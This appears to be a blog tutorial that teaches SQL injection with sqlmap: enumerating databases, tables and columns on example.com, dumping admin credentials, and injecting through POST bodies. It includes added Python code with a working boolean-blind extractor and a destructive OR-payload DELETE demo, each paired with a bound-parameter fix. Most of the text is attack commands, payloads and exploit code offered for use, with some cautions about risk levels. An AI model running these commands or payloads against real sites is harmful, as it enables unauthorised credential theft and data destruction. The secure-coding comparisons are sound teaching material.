[Offensive Tutorial] Guide to do SQL Injection with SQLMAP !

PurpulHat
6 min read · May 31, 2023


This course complements [Hacking Beginner] SQLMAP : Learn SQL Injection ! Please read it first if you don’t know much about SQL Injection.

Here, I will try my best to teach you how to use SQLMAP at 3 different levels.

  • Beginner
  • Advanced [You are here !]
  • Expert [Come soon…]

You should be aware that websites do not, generally speaking, keep all their content in a single database.

For example, a site may have one database for its articles, another for its users, and another for the administrator accounts.

That is why we first need to find out which databases exist, so we can pick the one we want!

You should already have run the command from the previous course, so that SQLMAP has confirmed an injectable parameter; otherwise none of the commands below will work (SQLMAP will just report that the tested parameters do not appear to be injectable).

SQLMAP stores what it learned (the injectable parameter, the working payload, the backend DBMS) in a session file inside its output directory, so the next commands reuse it and go straight to what we ask for, in this case the database names.

For this, please follow this command :

sqlmap -u "https://example.com/login?username=admin&password=azerty123" --dbs --threads=3

What are all these options :

  • -u "WebSite" : the target URL, including the parameters we want to test
  • --dbs : ask SQLMAP to enumerate the database names
  • --threads=N [1 to 10] : maximum number of concurrent HTTP requests, to speed things up. Be aware: the higher the number, the greater the chance of errors, or of being banned from the website! (Default : 1)

Take a coffee, be patient and wait for the result !
You should get a result like this :

[*] information_schema
[*] admins
[*] mysql
[*] performance_schema

Getting Table Names is very similar to getting Database Names !
We just need to specify which Database we want the Table Names from.

For this, please follow this command :

sqlmap -u "https://example.com/login?username=admin&password=azerty123" -D admins --tables --threads=3

What are all these options :

  • -u "WebSite" : the target URL
  • -D : the Database we want information from (admins, taken from the previous result)
  • --tables : ask SQLMAP to enumerate only the Table Names
  • --threads=N [1 to 10] : maximum number of concurrent HTTP requests, to speed things up. Be aware: the higher the number, the greater the chance of errors, or of being banned from the website! (Default : 1)

Take another coffee, be patient and wait for the result !
You should get a result like this :

+-----------------+
| admins_accounts |
| admins_notes    |
+-----------------+

In this case, we got two tables !

One is admins_notes, which we don’t really care about…
The other one is admins_accounts ! Now, we will try to get information out of this one.

It’s exactly the same as before.
We just need to specify which Database and which Table we want the Column Names from.

For this, please follow this command :

sqlmap -u "https://example.com/login?username=admin&password=azerty123" -D admins -T admins_accounts --columns --threads=3

What are all these options :

  • -u "WebSite" : the target URL
  • -D : the Database we want information from
  • -T : the Table we want information from
  • --columns : ask SQLMAP to enumerate only the Column Names (and their types)
  • --threads=N [1 to 10] : maximum number of concurrent HTTP requests, to speed things up. Be aware: the higher the number, the greater the chance of errors, or of being banned from the website! (Default : 1)

Don’t take another coffee; be patient without one and wait for the result !
You should get a result like this :

+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(256) |
| id       | int(11)      |
| username | varchar(256) |
+----------+--------------+

We are so close !
We just need to specify which Columns we want to pull the data from !

For this, please follow this command :

sqlmap -u "https://example.com/login?username=admin&password=azerty123" -D admins -T admins_accounts -C username,password --dump --threads=3

What are all these options :

  • -u "WebSite" : the target URL
  • -D : the Database we want information from
  • -T : the Table we want information from
  • -C : the Column(s) we want information from, comma-separated
  • --dump : retrieve the entries of the selected Columns (SQLMAP prints them and also saves them as a CSV file in its output directory)
  • --threads=N [1 to 10] : maximum number of concurrent HTTP requests, to speed things up. Be aware: the higher the number, the greater the chance of errors, or of being banned from the website! (Default : 1)

Take a Tea (please don’t take an Earl Grey, it’s disgusting), be patient and wait for the result !
You should get a result like this :

+----------+----------+
| password | username |
+----------+----------+
| christy  | shameka  |
+----------+----------+

What a hacker ! You found credentials by yourself ! Bravo

One caveat: on a real target the password column usually holds hashes rather than plaintext. When SQLMAP recognises a hash format in the dumped data, it offers to crack the hashes with a dictionary attack right away.
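What SQLMAP is automating in the four commands above, as an added example that is not part of the original post: a small, deliberately vulnerable login over an in-memory SQLite database (the table names, rows and function names are made up for the demo) and a boolean-based blind extractor that walks the same chain, tables, then columns, then rows, by asking the application nothing but yes/no questions through the username field. SQLite’s sqlite_master stands in for MySQL’s information_schema. The hardened safe_login, using bound parameters, sits beside the vulnerable one so you can see the same extractor come back empty-handed.

```python
import sqlite3

# Constructed demo data (assumption, not from the post): the database the
# post's sqlmap output shows, rebuilt in memory.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE admins_accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE admins_notes    (id INTEGER PRIMARY KEY, note TEXT);
        INSERT INTO admins_accounts (username, password) VALUES ('shameka', 'christy');
        INSERT INTO admins_notes (note) VALUES ('rotate the backup key');
    """)
    return con

def vulnerable_login(con, username, password):
    """Deliberately vulnerable: user input is pasted into the SQL text."""
    sql = (f"SELECT id FROM admins_accounts "
           f"WHERE username='{username}' AND password='{password}'")
    return con.execute(sql).fetchone() is not None

def safe_login(con, username, password):
    """Hardened form: bound parameters, so input can never change the query."""
    sql = "SELECT id FROM admins_accounts WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone() is not None

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"

def oracle(con, login, condition):
    """One yes/no question to the app: does <condition> hold? The trailing '--'
    comments out the rest of the original WHERE clause, like a sqlmap payload."""
    return login(con, f"' OR ({condition})--", "irrelevant")

def extract_string(con, login, expr, max_len=64):
    """Recover the result of a scalar SQL expression one character at a time.
    This is sqlmap's boolean-based blind technique, minus the bisection it
    uses to cut the number of requests."""
    value = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if oracle(con, login, f"substr(({expr}),{pos},1)='{ch}'"):
                value += ch
                break
        else:
            break  # no candidate matched: end of string (or NULL)
    return value

def extract_list(con, login, row_expr):
    """Walk a result set row by row with LIMIT 1 OFFSET n until it runs out."""
    items = []
    for n in range(100):
        item = extract_string(con, login, f"{row_expr} LIMIT 1 OFFSET {n}")
        if not item:
            break
        items.append(item)
    return items

def enumerate_tables(con, login):
    # sqlmap --tables ; sqlite_master plays the role of information_schema
    return extract_list(con, login,
                        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name")

def enumerate_columns(con, login, table):
    # sqlmap -T <table> --columns
    return extract_list(con, login,
                        f"SELECT name FROM pragma_table_info('{table}') ORDER BY cid")

def dump_column(con, login, table, column):
    # sqlmap -C <column> --dump
    return extract_list(con, login, f"SELECT {column} FROM {table} ORDER BY id")

def run_chain(login=vulnerable_login):
    """The full sqlmap-style chain, tables -> columns -> dump, through the oracle only."""
    con = build_db()
    tables = enumerate_tables(con, login)
    result = {"tables": tables}
    if "admins_accounts" in tables:
        result["columns"] = enumerate_columns(con, login, "admins_accounts")
        result["dump"] = {c: dump_column(con, login, "admins_accounts", c)
                          for c in ("username", "password")}
    return result

if __name__ == "__main__":
    print(run_chain(vulnerable_login))  # recovers the demo credentials
    print(run_chain(safe_login))        # {'tables': []}: nothing leaks
```

Every character costs up to 37 requests here; sqlmap bisects on the character code instead, which is why it needs far fewer requests and why --threads makes such a difference on blind injections.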

You don’t have a URL such as example.com/login?user=A&pass=B, only something like example.com/login ? That isn’t a problem.

Every part of an HTTP request can carry data you can use for SQL Injection.
To see the whole request, put an intercepting proxy such as Burp Suite between your browser and the website. You will see something like this :

POST /login HTTP/2
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: useless/info,application/xhtml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

username=ABC&password=123

When you log into a website, the form fields travel in the body of a POST request. Pass that body to SQLMAP with --data, and give -u the URL without any query string, like this :

sqlmap -u "https://example.com/login" --data "username=ABC&password=123" (+ add any other option you want here)

SQLMAP then tests the POST parameters username and password. You can also save the whole intercepted request to a file and hand it over with -r, so cookies and the other headers are replayed exactly as the browser sent them.

Difference between --risk and --level !

  • --level [1 to 5]

The level option tells SQLMAP where to look for an injection point (and, at higher levels, to try more payloads).

  • On level 1 (Default)
    SQLMAP tests only GET and POST parameters.
  • On level 2
    SQLMAP also tests the values of the HTTP Cookie header.
  • On level 3
    SQLMAP also tests the HTTP User-Agent and Referer headers.
  • On level 4
    No new injection points; it simply enables more payloads.
  • On level 5
    SQLMAP also tests the HTTP Host header.

  • --risk [1 to 3]

The risk option controls how dangerous the payloads may be for the target !
DON’T RAISE IT ON A BUG BOUNTY TARGET unless the program explicitly allows it.

  • On risk 1 (Default)
    Least offensive. Safe to use.
  • On risk 2
    Adds heavy time-based queries. They make the database server sleep or burn CPU on every request, which can seriously slow down the website.
  • On risk 3
    Adds “OR”-based payloads. POTENTIALLY DESTRUCTIVE ! If the injectable parameter sits inside an UPDATE or DELETE statement, an always-true OR condition applies that statement to every row of the table.
    USE IT ONLY ON SYSTEMS YOU OWN.
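Why risk 3 earns that warning, as an added example that is not part of the original post (the table, rows and function names are made up for the demo, and SQLite stands in for the target’s database): the same always-true OR payload that merely leaks rows when the injectable parameter sits in a SELECT wipes the table when it sits in a DELETE. The bound-parameter version beside it shows the payload matching nothing at all.

```python
import sqlite3

# Constructed demo table (assumption, not from the post): the admins_notes
# table the post enumerates, filled with three made-up rows.
def build_notes():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE admins_notes (id INTEGER PRIMARY KEY, note TEXT);
        INSERT INTO admins_notes (note) VALUES ('note one'), ('note two'), ('note three');
    """)
    return con

def note_count(con):
    return con.execute("SELECT count(*) FROM admins_notes").fetchone()[0]

# Two deliberately vulnerable handlers that paste the id straight into the SQL.
def view_note_vulnerable(con, note_id):
    """Injection in a SELECT: an always-true OR only leaks extra rows."""
    rows = con.execute(f"SELECT note FROM admins_notes WHERE id='{note_id}'").fetchall()
    return len(rows)

def delete_note_vulnerable(con, note_id):
    """Injection in a DELETE: the same OR payload applies the DELETE to every row."""
    cur = con.execute(f"DELETE FROM admins_notes WHERE id='{note_id}'")
    return cur.rowcount

def delete_note_safe(con, note_id):
    """Hardened form: a bound parameter is data, never SQL."""
    cur = con.execute("DELETE FROM admins_notes WHERE id=?", (note_id,))
    return cur.rowcount

OR_PAYLOAD = "1' OR '1'='1"   # the shape of payload sqlmap only tries at --risk 3

def demo(handler, note_id):
    """Run one handler on a fresh table; return (rows touched, rows left)."""
    con = build_notes()
    touched = handler(con, note_id)
    return touched, note_count(con)

if __name__ == "__main__":
    print(demo(view_note_vulnerable, "1"))          # (1, 3): normal lookup
    print(demo(view_note_vulnerable, OR_PAYLOAD))   # (3, 3): every note leaks, nothing lost
    print(demo(delete_note_vulnerable, "1"))        # (1, 2): normal delete
    print(demo(delete_note_vulnerable, OR_PAYLOAD)) # (3, 0): the whole table is gone
    print(demo(delete_note_safe, OR_PAYLOAD))       # (0, 3): payload matches nothing
```

SQLMAP cannot tell from the outside whether the parameter it is testing feeds a SELECT or a DELETE, which is exactly why OR-based payloads are held back until you opt in with --risk 3.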

👏 Please, don’t forget to “Applaud” this, and don’t hesitate to follow me for more ! Thanks for reading !

If you don’t own cybersecurity, cybersecurity will own you.

The information provided in cybersecurity blogs is for informational purposes only. I do not guarantee accuracy or endorse any actions taken based on the content. Use at your own risk.


PurpulHat

PenTester wannabe, I want to share all the knowledge I got.